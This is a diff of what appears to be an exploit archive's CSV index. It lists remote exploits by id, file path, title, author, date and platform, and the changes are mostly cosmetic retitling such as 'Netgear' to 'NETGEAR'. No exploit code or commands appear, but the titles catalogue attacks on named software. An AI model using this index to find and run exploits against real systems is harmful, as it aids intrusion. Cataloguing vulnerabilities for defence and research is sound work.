-22012,platforms/linux/remote/22012.c,"Light HTTPD 0.1 - GET Request Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote,0
-22013,platforms/linux/remote/22013.c,"Light HTTPD 0.1 - GET Request Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote,0
+22012,platforms/linux/remote/22012.c,"Light HTTPD 0.1 - GET Buffer Overflow (1)",2002-11-12,Xpl017Elz,linux,remote,0
+22013,platforms/linux/remote/22013.c,"Light HTTPD 0.1 - GET Buffer Overflow (2)",2002-11-12,uid0x00,linux,remote,0
 22016,platforms/linux/remote/22016.c,"LibHTTPD 1.2 - POST Buffer Overflow",2002-11-13,Xpl017Elz,linux,remote,0
 22018,platforms/windows/remote/22018.pl,"Key Focus KF Web Server 1.0.8 - Directory Traversal",2002-11-13,mattmurphy,windows,remote,0
 22020,platforms/multiple/remote/22020.pl,"Perception LiteServe 2.0 - CGI Source Disclosure",2002-11-14,mattmurphy,multiple,remote,0
@@ -12964,7 +12965,7 @@ id,file,description,date,author,platform,type,port
 22224,platforms/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",multiple,remote,0
 22226,platforms/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",windows,remote,0
 22229,platforms/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",windows,remote,0
-22236,platforms/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,hardware,remote,0
+22236,platforms/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,hardware,remote,0
 22244,platforms/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",hardware,remote,0
 22251,platforms/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Buffer Overflow",2006-09-28,RoMaNSoFt,multiple,remote,0
 22264,platforms/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",linux,remote,0
@@ -13218,7 +13219,7 @@ id,file,description,date,author,platform,type,port
 23185,platforms/windows/remote/23185.txt,"software602 602pro lan suite 2003 - Directory Traversal",2003-09-25,"Phuong Nguyen",windows,remote,0
 23186,platforms/linux/remote/23186.txt,"MPlayer 0.9/1.0 - Streaming ASX Header Parsing Buffer Overrun",2003-09-25,"Otero Hernan",linux,remote,0
 23187,platforms/cgi/remote/23187.txt,"SBox 1.0.4 - Full Path Disclosure",2003-09-25,"Julio e2fsck Cesar",cgi,remote,0
-23188,platforms/linux/remote/23188.c,"Athttpd 0.4b - Remote GET Request Buffer Overrun",2003-09-25,r-code,linux,remote,0
+23188,platforms/linux/remote/23188.c,"Athttpd 0.4b - GET Remote Buffer Overrun",2003-09-25,r-code,linux,remote,0
 23196,platforms/linux/remote/23196.c,"WebFS 1.x - Long Pathname Buffer Overrun",2003-09-29,jsk,linux,remote,0
 23198,platforms/windows/remote/23198.txt,"Half-Life 1.1 - Invalid Command Error Response Format String",2003-09-29,"Luigi Auriemma",windows,remote,0
 23199,platforms/multiple/remote/23199.c,"OpenSSL - ASN.1 Parsing Vulnerabilities",2003-10-09,Syzop,multiple,remote,0
@@ -13262,7 +13263,7 @@ id,file,description,date,author,platform,type,port
 23323,platforms/windows/remote/23323.py,"Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution",2012-12-12,Abysssec,windows,remote,0
 23328,platforms/windows/remote/23328.py,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (1)",2003-11-03,airsupply,windows,remote,0
 23329,platforms/windows/remote/23329.c,"Nullsoft SHOUTcast 1.9.2 - icy-name/icy-url Memory Corruption (2)",2003-11-03,exworm,windows,remote,0
-23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - Long GET Request Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0
+23334,platforms/windows/remote/23334.pl,"IA WebMail Server 3.0/3.1 - GET Buffer Overrun",2003-11-03,"Peter Winter-Smith",windows,remote,0
 23340,platforms/windows/remote/23340.txt,"Microsoft Internet Explorer 6 - Double Slash Cache Zone Bypass",2003-10-05,"Liu Die Yu",windows,remote,0
 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service - Cross-Site Scripting",2003-11-17,"Ziv Kamir",multiple,remote,0
 23365,platforms/windows/remote/23365.txt,"TelCondex SimpleWebserver 2.13.31027 build 3289 - Directory Traversal",2003-11-10,nimber@designer.ru,windows,remote,0
@@ -13277,7 +13278,7 @@ id,file,description,date,author,platform,type,port
 23379,platforms/hardware/remote/23379.txt,"Fortigate Firewall 2.x - selector Admin Interface Cross-Site Scripting",2003-11-12,"Maarten Hartsuijker",hardware,remote,0
 23380,platforms/multiple/remote/23380.txt,"WebWasher Classic 2.2/3.3 - Error Message Cross-Site Scripting",2003-11-13,"Oliver Karow",multiple,remote,0
 23396,platforms/multiple/remote/23396.txt,"SIRCD Server 0.5.2/0.5.3 - Operator Privilege Escalation",2003-11-20,"Victor Jerlin",multiple,remote,0
-23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - Overly Long HTTP Request Buffer Overrun",2003-11-24,Shadowinteger,linux,remote,0
+23397,platforms/linux/remote/23397.pl,"Monit 1.4/2.x/3/4 - Long HTTP Request Buffer Overrun",2003-11-24,Shadowinteger,linux,remote,0
 23398,platforms/windows/remote/23398.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (1)",2003-11-25,"Paul Szabo",windows,remote,0
 23399,platforms/windows/remote/23399.pl,"Qualcomm Eudora 6.0.1/6.1.1 - Attachment LaunchProtect Warning Bypass Weakness (2)",2003-11-25,"Paul Szabo",windows,remote,0
 23400,platforms/windows/remote/23400.txt,"Microsoft Outlook Express 6.0 - MHTML Forced File Execution (1)",2003-11-25,"Liu Die",windows,remote,0
@@ -13372,7 +13373,7 @@ id,file,description,date,author,platform,type,port
 23679,platforms/windows/remote/23679.html,"Microsoft Internet Explorer 5 - Shell: IFrame Cross-Zone Scripting (2)",2004-02-10,"Cheng Peng Su",windows,remote,0
 23700,platforms/windows/remote/23700.txt,"ACLogic CesarFTP 0.99 - Remote Resource Exhaustion",2004-02-16,"intuit e.b.",windows,remote,0
 23707,platforms/multiple/remote/23707.txt,"Freeform Interactive Purge 1.4.7/Purge Jihad 2.0.1 Game Client - Remote Buffer Overflow",2004-02-16,"Luigi Auriemma",multiple,remote,0
-23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Request Buffer Overflow",2004-02-13,badpack3t,windows,remote,0
+23714,platforms/windows/remote/23714.c,"KarjaSoft Sami HTTP Server 1.0.4 - GET Buffer Overflow",2004-02-13,badpack3t,windows,remote,0
 23717,platforms/windows/remote/23717.txt,"Microsoft Windows XP - Help And Support Center Interface Spoofing",2004-02-17,"Bartosz Kwitkowski",windows,remote,0
 23721,platforms/hardware/remote/23721.txt,"Linksys WAP55AG 1.0.7 - SNMP Community String Insecure Configuration",2004-02-18,"NN Poster",hardware,remote,0
 23728,platforms/linux/remote/23728.txt,"Metamail 2.7 - Multiple Buffer Overflow/Format String Handling Vulnerabilities",2004-02-18,"Ulf Harnhammar",linux,remote,0
@@ -13455,7 +13456,7 @@ id,file,description,date,author,platform,type,port
 24079,platforms/linux/remote/24079.c,"APSIS Pound 1.5 - Remote Format String",2004-05-03,"Nilanjan De",linux,remote,0
 24084,platforms/multiple/remote/24084.py,"Nagios3 - history.cgi Remote Command Execution",2013-01-13,blasty,multiple,remote,0
 24093,platforms/linux/remote/24093.c,"Exim Sender 3.35 - Verification Remote Stack Buffer Overrun",2004-05-06,newroot,linux,remote,0
-24097,platforms/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Request Buffer Overflow",2004-05-06,badpack3t,windows,remote,0
+24097,platforms/windows/remote/24097.c,"MyWeb HTTP Server 3.3 - GET Buffer Overflow",2004-05-06,badpack3t,windows,remote,0
 24098,platforms/windows/remote/24098.txt,"Qualcomm Eudora 6.x - Embedded Hyperlink URI Obfuscation",2004-05-08,"Brett Glass",windows,remote,0
 24101,platforms/windows/remote/24101.txt,"Microsoft Outlook 2003 - Predictable File Location",2004-05-10,http-equiv,windows,remote,0
 24102,platforms/windows/remote/24102.txt,"Microsoft Internet Explorer 4/5/6 - Embedded Image URI Obfuscation",2004-05-10,http-equiv,windows,remote,0
@@ -13469,11 +13470,11 @@ id,file,description,date,author,platform,type,port
 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0
 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0
 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0
-24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
+24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Buffer Overflow",2004-04-23,CoolICE,windows,remote,0
 24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0
 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0
 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0
-24140,platforms/hardware/remote/24140.txt,"Netgear RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
+24140,platforms/hardware/remote/24140.txt,"NETGEAR RP114 3.26 - Content Filter Bypass",2004-05-24,"Marc Ruef",hardware,remote,0
 24148,platforms/multiple/remote/24148.txt,"Sun Java System Application Server 7.0/8.0 - Remote Installation Full Path Disclosure",2004-05-27,"Marc Schoenefeld",multiple,remote,0
 24149,platforms/php/remote/24149.php,"PHP 4/5 - Input/Output Wrapper Remote File Inclusion Function Command Execution",2004-05-27,Slythers,php,remote,0
 24187,platforms/windows/remote/24187.txt,"Microsoft Internet Explorer 6 - ADODB.Stream Object File Installation",2003-08-23,Jelmer,windows,remote,0
@@ -13640,7 +13641,7 @@ id,file,description,date,author,platform,type,port
 24904,platforms/windows/remote/24904.rb,"Java CMM - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,windows,remote,0
 24905,platforms/multiple/remote/24905.rb,"v0pCr3w (Web Shell) - Remote Code Execution (Metasploit)",2013-03-29,Metasploit,multiple,remote,0
 24907,platforms/windows/remote/24907.txt,"McAfee Virtual Technician (MVT) 6.5.0.2101 - Insecure ActiveX Method",2013-03-29,"High-Tech Bridge SA",windows,remote,0
-24931,platforms/hardware/remote/24931.rb,"Netgear DGN1000B - setup.cgi Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0
+24931,platforms/hardware/remote/24931.rb,"NETGEAR DGN1000B - setup.cgi Remote Command Execution (Metasploit)",2013-04-08,Metasploit,hardware,remote,0
 24935,platforms/linux/remote/24935.rb,"MongoDB - nativeHelper.apply Remote Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
 24936,platforms/hardware/remote/24936.rb,"Linksys E1500/E2500 - apply.cgi Remote Command Injection (Metasploit)",2013-04-08,Metasploit,hardware,remote,0
 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
@@ -13657,7 +13658,7 @@ id,file,description,date,author,platform,type,port
 24961,platforms/windows/remote/24961.html,"FirePHP Firefox Plugin 0.7.1 - Remote Command Execution",2013-04-17,Wireghoul,windows,remote,0
 24963,platforms/multiple/remote/24963.rb,"SAP ConfigServlet - OS Command Execution (Metasploit)",2013-04-18,"Andras Kabai",multiple,remote,50000
 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0
-24974,platforms/hardware/remote/24974.rb,"Netgear DGN2200B - pppoe.cgi Remote Command Execution (Metasploit)",2013-04-22,Metasploit,hardware,remote,0
+24974,platforms/hardware/remote/24974.rb,"NETGEAR DGN2200B - pppoe.cgi Remote Command Execution (Metasploit)",2013-04-22,Metasploit,hardware,remote,0
 24976,platforms/multiple/remote/24976.rb,"Java Applet - Reflection Type Confusion Remote Code Execution (Metasploit)",2013-04-23,Metasploit,multiple,remote,0
 24979,platforms/multiple/remote/24979.txt,"XLReader 0.9 - Remote Client-Side Buffer Overflow",2004-12-16,"Kris Kubicki",multiple,remote,0
 24980,platforms/multiple/remote/24980.txt,"Yanf 0.4 - HTTP Response Buffer Overflow",2004-12-15,"Ariel Berkman",multiple,remote,0
@@ -14113,14 +14114,14 @@ id,file,description,date,author,platform,type,port
 29035,platforms/windows/remote/29035.rb,"SikaBoom - Remote Buffer Overflow (Metasploit)",2013-10-18,Asesino04,windows,remote,0
 29045,platforms/windows/remote/29045.txt,"Selenium Web Server 1.0 - Cross-Site Scripting",2006-11-15,"Greg Linares",windows,remote,0
 29083,platforms/windows/remote/29083.txt,"Sage 1.3.x - IMG Element Input Validation",2006-09-08,"Kevin Kierznowski",windows,remote,0
-29096,platforms/windows/remote/29096.rb,"Netgear MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
+29096,platforms/windows/remote/29096.rb,"NETGEAR MA521 Wireless Driver 5.148.724 - Long Beacon Probe Buffer Overflow",2006-11-18,"Laurent Butti",windows,remote,0
 29127,platforms/hardware/remote/29127.rb,"D-Link DIR-605L - Captcha Handling Buffer Overflow (Metasploit)",2013-10-22,Metasploit,hardware,remote,80
 29129,platforms/windows/remote/29129.rb,"Interactive Graphical SCADA System - Remote Command Injection (Metasploit)",2013-10-22,Metasploit,windows,remote,12397
 29130,platforms/windows/remote/29130.rb,"HP Intelligent Management Center BIms UploadServlet - Directory Traversal (Metasploit)",2013-10-22,Metasploit,windows,remote,8080
 29132,platforms/unix/remote/29132.rb,"WebTester 5.x - Command Execution (Metasploit)",2013-10-22,Metasploit,unix,remote,80
 29160,platforms/linux/remote/29160.c,"GNU Tar 1.1x - GNUTYPE_NAMES Directory Traversal",2006-11-21,"Teemu Salmela",linux,remote,0
 29146,platforms/windows/remote/29146.c,"Novell Client 4.91 - 'NWSPOOL.dll' Remote Buffer Overflow",2006-11-21,"Andres Tarasco Acuna",windows,remote,0
-29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0
+29167,platforms/windows/remote/29167.rb,"NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0
 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0
 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,php,remote,80
 29273,platforms/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080
@@ -14205,7 +14206,7 @@ id,file,description,date,author,platform,type,port
 29807,platforms/php/remote/29807.php,"PHP 5.1.6 - 'Imap_Mail_Compose()' Function Buffer Overflow",2007-03-31,"Stefan Esser",php,remote,0
 29808,platforms/php/remote/29808.php,"PHP 5.1.6 - 'Msg_Receive()' Memory Allocation Integer Overflow",2007-03-31,"Stefan Esser",php,remote,0
 29814,platforms/windows/remote/29814.txt,"NextPage LivePublish 2.02 - 'LPEXT.dll' Cross-Site Scripting",2007-04-03,"Igor Monteiro Vieira",windows,remote,0
-29815,platforms/hardware/remote/29815.rb,"Netgear ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443
+29815,platforms/hardware/remote/29815.rb,"NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)",2013-11-25,Metasploit,hardware,remote,443
 29820,platforms/multiple/remote/29820.html,"Firebug 1.03 - Rep.JS Script Code Injection",2007-03-06,"Thor Larholm",multiple,remote,0
 29952,platforms/windows/remote/29952.html,"Sienzo Digital Music Mentor - 'DSKernel2.dll' ActiveX Control Stack Buffer Overflow",2007-05-07,shinnai,windows,remote,0
 29840,platforms/windows/remote/29840.html,"Roxio CinePlayer 3.2 - 'SonicDVDDashVRNav.dll' ActiveX Control Remote Buffer Overflow",2007-04-11,"Carsten Eiram",windows,remote,0
@@ -14323,7 +14324,7 @@ id,file,description,date,author,platform,type,port
 30645,platforms/windows/remote/30645.txt,"Microsoft Windows - URI Handler Command Execution",2007-10-05,"Billy Rios",windows,remote,0
 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 - SIP From Field HTML Injection",2007-10-09,"Radu State",hardware,remote,0
 30652,platforms/hardware/remote/30652.txt,"Cisco IOS 12.3 - LPD Remote Buffer Overflow",2007-10-10,"Andy Davis",hardware,remote,0
-30673,platforms/hardware/remote/30673.txt,"Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0
+30673,platforms/hardware/remote/30673.txt,"NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting",2007-10-15,SkyOut,hardware,remote,0
 30677,platforms/linux/remote/30677.pl,"Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection",2007-10-16,"Humberto J. Abdelnur",linux,remote,0
 30678,platforms/multiple/remote/30678.java,"Nortel Networks UNIStim IP SoftPhone 2050 - RTCP Port Buffer Overflow",2007-10-18,"Cyrill Brunschwiler",multiple,remote,0
 30692,platforms/windows/remote/30692.js,"RealPlayer 10.0/10.5/11 - 'ierpplug.dll' ActiveX Control Import Playlist Name Stack Buffer Overflow",2007-10-18,anonymous,windows,remote,0
@@ -14357,7 +14358,7 @@ id,file,description,date,author,platform,type,port
 30915,platforms/hardware/remote/30915.rb,"SerComm Device - Remote Code Execution (Metasploit)",2014-01-14,Metasploit,hardware,remote,32764
 30920,platforms/windows/remote/30920.html,"HP eSupportDiagnostics 1.0.11 - 'hpediag.dll' ActiveX Control Multiple Information Disclosure Vulnerabilities",2007-12-20,"Elazar Broad",windows,remote,0
 30928,platforms/php/remote/30928.php,"PDFlib 7.0.2 - Multiple Remote Buffer Overflow Vulnerabilities",2007-12-24,poplix,php,remote,0
-30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - Crafted '.ZPL' File Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
+30933,platforms/multiple/remote/30933.php,"Zoom Player 3.30/5/6 - '.ZPL' Error Message Arbitrary Code Execution",2007-12-24,"Luigi Auriemma",multiple,remote,0
 30935,platforms/hardware/remote/30935.txt,"ZYXEL P-330W - Multiple Vulnerabilities",2007-12-25,santa_clause,hardware,remote,0
 30939,platforms/windows/remote/30939.txt,"ImgSvr 0.6.21 - Error Message Remote Script Execution",2007-12-26,anonymous,windows,remote,0
 30944,platforms/multiple/remote/30944.txt,"Feng 0.1.15 - Multiple Remote Buffer Overflow / Denial of Service Vulnerabilities",2007-12-27,"Luigi Auriemma",multiple,remote,0
@@ -14453,7 +14454,7 @@ id,file,description,date,author,platform,type,port
 31694,platforms/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",windows,remote,0
 31695,platforms/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,php,remote,0
 31706,platforms/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",unix,remote,0
-31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Request Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
+31736,platforms/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - POST Stack Buffer Overflow",2014-02-18,Sumit,windows,remote,80
 31737,platforms/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,windows,remote,0
 31756,platforms/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0
 31757,platforms/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",multiple,remote,0
@@ -14659,7 +14660,7 @@ id,file,description,date,author,platform,type,port
 33023,platforms/multiple/remote/33023.txt,"Apache Tomcat 6.0.18 - Form Authentication Existing/Non-Existing 'Username' Enumeration",2009-06-03,"D. Matscheko",multiple,remote,0
 33024,platforms/windows/remote/33024.txt,"Microsoft Internet Explorer 5.0.1 - Cached Content Cross Domain Information Disclosure",2009-06-09,"Jorge Luis Alvarez Medina",windows,remote,0
 33025,platforms/windows/remote/33025.txt,"LogMeIn 4.0.784 - 'cfgadvanced.html' HTTP Header Injection",2009-06-05,Inferno,windows,remote,0
-33027,platforms/windows/remote/33027.py,"Kolibri Web Server 2.0 - GET Request Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
+33027,platforms/windows/remote/33027.py,"Kolibri Web Server 2.0 - GET Stack Buffer Overflow",2014-04-25,Polunchis,windows,remote,80
 33032,platforms/linux/remote/33032.txt,"Compress::Raw::Zlib Perl Module - Remote Code Execution",2009-05-11,"Leo Bergolth",linux,remote,0
 33033,platforms/multiple/remote/33033.html,"WebKit - JavaScript 'onload()' Event Cross Domain Scripting",2009-05-08,"Michal Zalewski",multiple,remote,0
 33034,platforms/linux/remote/33034.txt,"WebKit - XML External Entity Information Disclosure",2009-05-08,"Chris Evans",linux,remote,0
@@ -14699,7 +14700,7 @@ id,file,description,date,author,platform,type,port
 33164,platforms/multiple/remote/33164.txt,"WebKit - Floating Point Number Remote Buffer Overflow",2009-08-11,Apple,multiple,remote,0
 33165,platforms/hardware/remote/33165.txt,"2WIRE Routers - 'CD35_SETUP_01' Access Validation",2009-08-12,hkm,hardware,remote,0
 33172,platforms/windows/remote/33172.txt,"Valve Software Source Engine - Format String",2009-08-17,"Luigi Auriemma",windows,remote,0
-33177,platforms/hardware/remote/33177.txt,"NetGear WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0
+33177,platforms/hardware/remote/33177.txt,"NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities",2009-08-18,"Jean Trolleur",hardware,remote,0
 33192,platforms/multiple/remote/33192.php,"Google Chrome 6.0.472 - 'Math.Random()' Random Number Generation",2009-08-31,"Amit Klein",multiple,remote,0
 33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x - WHERE Clause Security Bypass",2009-09-02,"Johannes Dahse",multiple,remote,0
 33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 - ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow",2009-09-01,"optix hacker",windows,remote,0
@@ -14806,7 +14807,7 @@ id,file,description,date,author,platform,type,port
 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch - Malformed Webpage Remote Code Execution",2010-03-26,"Nishant Das Patnaik",osx,remote,0
 33816,platforms/multiple/remote/33816.pl,"Miranda IM 0.8.16 - Information Disclosure",2010-04-06,"Jan Schejbal",multiple,remote,0
 33817,platforms/windows/remote/33817.rb,"Ericom AccessNow Server - Buffer Overflow (Metasploit)",2014-06-19,Metasploit,windows,remote,8080
-33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Request Directory Traversal",2010-06-20,chr1x,windows,remote,0
+33852,platforms/windows/remote/33852.txt,"HTTP 1.1 - GET Directory Traversal",2010-06-20,chr1x,windows,remote,0
 33826,platforms/linux/remote/33826.txt,"TCPDF 4.5.036/4.9.5 - 'Parameters' Attribute Remote Code Execution",2010-04-08,apoc,linux,remote,0
 33829,platforms/windows/remote/33829.c,"WinSoftMagic Photo Editor - '.png' Buffer Overflow",2010-04-09,eidelweiss,windows,remote,0
 33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 - 'jtfwcpnt.jsp' SQL Injection",2010-04-15,"Joxean Koret",multiple,remote,0
@@ -14858,8 +14859,8 @@ id,file,description,date,author,platform,type,port
 34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) - Cross-Site Request Forgery",2010-05-26,"John Leitch",windows,remote,0
 34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 - 'pbx/gate' Cross-Site Request Forgery",2010-05-26,"John Leitch",multiple,remote,0
 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal",2010-05-27,"John Leitch",windows,remote,0
-34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Request (SEH)",2014-07-14,"Revin Hadi Saputra",windows,remote,0
-34063,platforms/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Request Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80
+34059,platforms/windows/remote/34059.py,"Kolibri Web Server 2.0 - GET Exploit (SEH)",2014-07-14,"Revin Hadi Saputra",windows,remote,0
+34063,platforms/hardware/remote/34063.rb,"D-Link Devices - 'info.cgi' POST Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80
 34064,platforms/hardware/remote/34064.rb,"D-Link HNAP - Request Remote Buffer Overflow (Metasploit)",2014-07-14,Metasploit,hardware,remote,80
 34065,platforms/hardware/remote/34065.rb,"D-Link Devices - Unauthenticated UPnP M-SEARCH Multicast Command Injection (Metasploit)",2014-07-14,Metasploit,hardware,remote,1900
 34066,platforms/windows/remote/34066.py,"HP Data Protector Manager 8.10 - Remote Command Execution",2014-07-14,Polunchis,windows,remote,0
@@ -15016,7 +15017,7 @@ id,file,description,date,author,platform,type,port
 35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0
 35180,platforms/bsd/remote/35180.rb,"Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)",2014-11-06,Metasploit,bsd,remote,0
 35183,platforms/php/remote/35183.rb,"X7 Chat 2.0.5 - 'message.php' PHP Code Execution (Metasploit)",2014-11-06,Metasploit,php,remote,80
-35184,platforms/hardware/remote/35184.py,"Belkin n750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
+35184,platforms/hardware/remote/35184.py,"Belkin N750 - jump login Parameter Buffer Overflow",2014-11-06,"Marco Vaz",hardware,remote,8080
 35188,platforms/windows/remote/35188.py,"Solar FTP Server 2.1.1 - 'PASV' Command Remote Buffer Overflow",2011-01-10,"John Leitch",windows,remote,0
 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 - 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
 35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server - Remote Code Execution (Metasploit)",2014-11-10,Metasploit,java,remote,8001
@@ -15118,7 +15119,7 @@ id,file,description,date,author,platform,type,port
 35806,platforms/windows/remote/35806.c,"Poison Ivy 2.3.2 - Unspecified Remote Buffer Overflow",2011-05-27,"Kevin R.V",windows,remote,0
 35809,platforms/windows/remote/35809.c,"Microsoft Windows Live Messenger 14 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2011-05-31,Kalashinkov3,windows,remote,0
 35810,platforms/linux/remote/35810.txt,"libxmlInvalid 2.7.x - XPath Multiple Memory Corruption Vulnerabilities",2011-05-31,"Chris Evans",linux,remote,0
-35817,platforms/hardware/remote/35817.txt,"Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
+35817,platforms/hardware/remote/35817.txt,"NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities",2011-06-01,"Juerd Waalboer",hardware,remote,0
 35818,platforms/multiple/remote/35818.txt,"Nagios 3.2.3 - 'expand' Parameter Cross-Site Scripting",2011-06-01,"Stefan Schurtz",multiple,remote,0
 35822,platforms/windows/remote/35822.html,"Samsung SmartViewer BackupToAvi 3.0 - Remote Code Execution",2015-01-19,"Praveen Darshanam",windows,remote,0
 35836,platforms/linux/remote/35836.pl,"Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass",2011-06-08,dst,linux,remote,0
@@ -15355,7 +15356,7 @@ id,file,description,date,author,platform,type,port
 38124,platforms/android/remote/38124.py,"Google Android - 'Stagefright' Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0
 38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console - Directory Traversal",2013-01-09,"Dhruv Shah",linux,remote,0
 38151,platforms/windows/remote/38151.py,"Microsoft Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
